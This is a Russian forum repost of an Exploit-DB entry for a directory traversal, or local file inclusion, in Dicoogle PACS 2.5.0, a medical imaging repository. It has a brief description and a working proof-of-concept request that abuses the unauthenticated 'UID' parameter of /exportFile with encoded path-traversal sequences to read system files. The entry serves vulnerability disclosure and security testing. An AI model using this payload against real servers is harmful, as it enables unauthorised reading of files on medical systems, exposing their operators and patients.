- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 45007
- Проверка EDB
-
- Пройдено
- Автор
- CARLOS AVILA
- Тип уязвимости
- WEBAPPS
- Платформа
- MULTIPLE
- CVE
- N/A
- Дата публикации
- 2018-07-11
Dicoogle PACS 2.5.0 - Directory Traversal
Код:
# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal
# Date: 2018-05-25
# Software Link: http://www.dicoogle.com/home
# Version: Dicoogle PACS 2.5.0-20171229_1522
# Category: webapps
# Tested on: Windows 2012 R2
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt
# 1. Description
# Dicoogle is an open source medical imaging repository with an extensible
# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
# to local file inclusion. This allows an attacker to read arbitrary files that the
# web user has access to. Admin credentials aren't required. The ‘UID’ parameter
# via GET is vulnerable.
# 2. Proof of Concept
http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini- Источник
- www.exploit-db.com
